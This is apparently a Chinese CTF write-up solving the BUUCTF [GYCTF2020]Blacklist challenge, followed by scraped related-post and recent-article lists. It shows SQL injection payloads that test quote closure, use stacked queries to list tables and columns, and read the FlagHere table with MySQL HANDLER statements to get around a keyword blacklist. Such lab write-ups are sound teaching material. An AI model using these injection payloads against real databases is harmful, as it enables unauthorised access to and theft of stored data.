buuctf-[GYCTF2020]Blacklist1(小宇特详解)

1.先看题目是一道sql注入的题目

先尝试进行闭合

payload:1’

这里可以试出来是'来进行闭合即可

2.然后尝试着进行联合查询

发现是进行了过滤。

3.这里尝试着进行堆叠注入

payload:1’;show tables;#

4.查表

payload:1’; show columns from FlagHere;#

这里屏蔽了许多东西

5.这里由于rename,和alter被过滤了,这里考虑利用HANDLER语句

这里先解释一下HANDLER语句的用法

这里的HANDLER语句和select查询语句都可以在mysql中查询想要的东西

他的基本语句是

通过HANDLER tbl_name OPEN打开一张表,无返回结果。

通过HANDLER tbl_name READ FIRST获取tbl_name的第一行,通过READ NEXT依次获取其它行。最后一行执行之后再执行NEXT会返回一个空的结果。
通过HANDLER tbl_name CLOSE来关闭打开的tbl_name。

payload:1’;handler FlagHere open;handler FlagHere read first;handler FlagHere close;#

buuctf-[GYCTF2020]Blacklist1(小宇特详解)相关推荐

  1. nps内网穿透服务器搭建教程(阿里云)-小宇特详解

    nps内网穿透服务器搭建教程(阿里云)-小宇特详解 前期准备 1.一台云服务器 2.配置安全组 3.在自己的电脑上安装nps 云服务器的话自己买,我这里使用的是阿里云 讲一下配置安全组 打开阿里云的官 ...

  2. cc链2(小宇特详解)

    cc链2(小宇特详解) 漏洞环境 jdk8u71 apache commons collection-4.0 与cc链1的区别 cc链2利用链中使用了动态字节码编程来构造poc cc链2没有使用反序列 ...

  3. Joomla远程代码执行漏洞分析小白版(小宇特详解)

    Joomla远程代码执行漏洞分析小白版(小宇特详解) 今天看了一下2021陇原战役WP,在看web方向的时候,看到pop链,想了解一下,后来又看到了p师傅在15年的一篇文章,在这里记录一下.这里主要是 ...

  4. buuctf-[BSidesCF 2020]Had a bad day(小宇特详解)

    buuctf-[BSidesCF 2020]Had a bad day(小宇特详解) 先看一下题目 这里上面有注入点,这里怀疑是SQL注入 先尝试读取一下index.php 这里使用php伪协议 pa ...

  5. java中北大学ppt总结+课后习题第四章(小宇特详解)

    java中北大学ppt总结+课后习题第四章(小宇特详解) 继承 子类与父类 继承是根据现有类创建新的类的机制,由继承而得到的新类称为子类(subclass)或派生类(derived class),被继 ...

  6. 数据库中北大学第二章ppt总结和课后习题详解(小宇特详解)

    数据库中北大学第二章ppt总结和课后习题详解(小宇特详解) 第2章 数据模型与系统结构 2.1 数据模型的基本概念 现实世界--具体事物->信息世界--概念模型->机器世界--DBMS支持 ...

  7. 解决kali中john无法破解hash(小宇特详解)

    解决kali中john无法破解hash(小宇特详解) 问题描述: john使用w=/usr/share/wordlists/rockyou.txt来进行破解无法进行破解. 报错: /usr/share ...

  8. buuctf-[GXYCTF2019]BabySQli WP(小宇特详解)

    buuctf-[GXYCTF2019]BabySQli WP(小宇特详解) 这里先看一下源码 查看search.php 这里先base32解码,然后在base64解码得到 select * from ...

  9. java中北大学ppt总结+课后习题第二章(小宇特详解)

    java中北大学ppt总结+课后习题第二章(小宇特详解) 基本数据类型 Java语言有8种基本数据类型. 逻辑类型:boolean.1字节 整数类型: 1字节整数类型:byte. 2字节整数类型:sh ...

最新文章

  1. Android --- 解决 cannot connect to daemon at tcp:5037: cannot connect to 127.0.0.1:5037: 由于目标计算机积极拒绝,无
  2. SpringMVC Controller 和 Servlet的关系
  3. mysqld与mysqld_safe的区别
  4. Native与H5交互的一些解决方法
  5. jar构建docker镜像_dockerfile构建docker镜像详细说明,主要是springboot的jar包构建镜像样例...
  6. php中未定义的变量使用技巧
  7. 库克看下!华为MatePad 11月25日发布:剑指苹果
  8. 【matlab】在图中插入矩形(框or阴影)
  9. centos7 redis分布式集群问题总结
  10. matlab单机无限大系统_MATLAB运用simulink建立简单的单机-无穷大系统仿真
  11. 辅助进度控制的计算机软件是指,辅助进度控制的计算机软件是指以( )为核心的项目管理软件包。...
  12. 全国最大直男论坛的性感女神翻车了,网友:乔碧萝第二
  13. python高考考题_假如高考考python编程,这些题目你会几个呢?
  14. Aruba 无线调试(Instant AP)
  15. 香港一卡通攻略:取款省4倍手续费
  16. 赛迪报告:除了“会呼吸”的肺,这些也能用3D打印实现!
  17. 【期末大作业】公益网站ps平面设计
  18. Android——SVG图片转成安卓能用的vector矢量图
  19. 给iOS App减肥
  20. 安装conda搭建python环境(保姆级教程)

热门文章

  1. SEO上下线营销思维:二者兼备实现“落地”
  2. 自学编程的妙方法,直接省了几万块钱报班,不收藏就可惜了!
  3. kubectl命令行管理工具
  4. QQ第三方登陆流程详解
  5. 关于技术博客--找工作--这些年--陆续的
  6. 中国头孢他美酯片市场趋势报告、技术动态创新及市场预测
  7. 国内B端竞品调研网站一网打尽
  8. Qt 基于http的网络文件下载
  9. 别再纠结于那些自动化测试不得不面对的现实z
  10. javaWeb项目设置error页面